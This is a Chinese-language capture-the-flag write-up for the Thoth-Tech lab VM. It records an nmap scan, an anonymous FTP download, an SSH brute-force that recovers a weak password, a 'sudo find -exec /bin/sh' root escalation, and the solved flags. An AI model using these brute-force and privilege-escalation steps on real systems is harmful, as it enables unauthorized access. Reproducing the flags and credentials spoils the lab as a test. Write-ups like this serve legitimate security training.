ThothTech wp

Thoth-Tech wp

信息收集

nmap 扫描得到

Nmap scan report for 192.168.148.188
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:BB:A9:C9 (VMware)

开启21端口，尝试anonymous登录

ftp> open 192.168.148.188
Connected to 192.168.148.188.
220 (vsFTPd 3.0.3)
Name (192.168.148.188:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             110 Jul 02 09:33 note.txt
226 Directory send OK.

发现ftp服务器上存在note.txt文件，尝试下载下来

ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.02 secs (4.7113 kB/s)

查看内容

root@kali:~# cat note.txt
Dear pwnlab,

My name is jake. Your password is very weak and easily crackable, I think change your password.

漏洞利用

提示弱密码，暴力破解ssh

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.148.188:22/
[STATUS] 113.00 tries/min, 113 tries in 00:01h, 14344287 to do in 2115:41h, 16 active
[22][ssh] host: 192.168.148.188   login: pwnlab   password: babygirl1

pwnlab@192.168.148.188 登录ssh

找到user.txt文件
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359

提升权限

pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find

find命令sudo提权，不需要密码，直接提权

sudo find user.txt -exec /bin/sh \; -quit

得到root权限

得到flag

寻找flag文件

# uid=0(root) gid=0(root) groups=0(root)
# ls
user.txt
# cd /root
# ls
root.txt  snap
# ls -al
total 44
drwx------  6 root root 4096 Nov 24  2021 .
drwxr-xr-x 20 root root 4096 Jun 28 18:32 ..
-rw-------  1 root root   14 Jul  2 09:38 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Nov 24  2021 .cache
drwxr-xr-x  3 root root 4096 Jun 28 19:09 .local
-rw-------  1 root root  146 Jun 28 19:05 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   57 Jul  2 08:51 root.txt
drwxr-xr-x  3 root root 4096 Jun 28 18:54 snap
drwx------  2 root root 4096 Jun 28 18:53 .ssh
# cd snap
# ls
lxd
# cd ..
# ls
root.txt  snap
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6

good job :)
#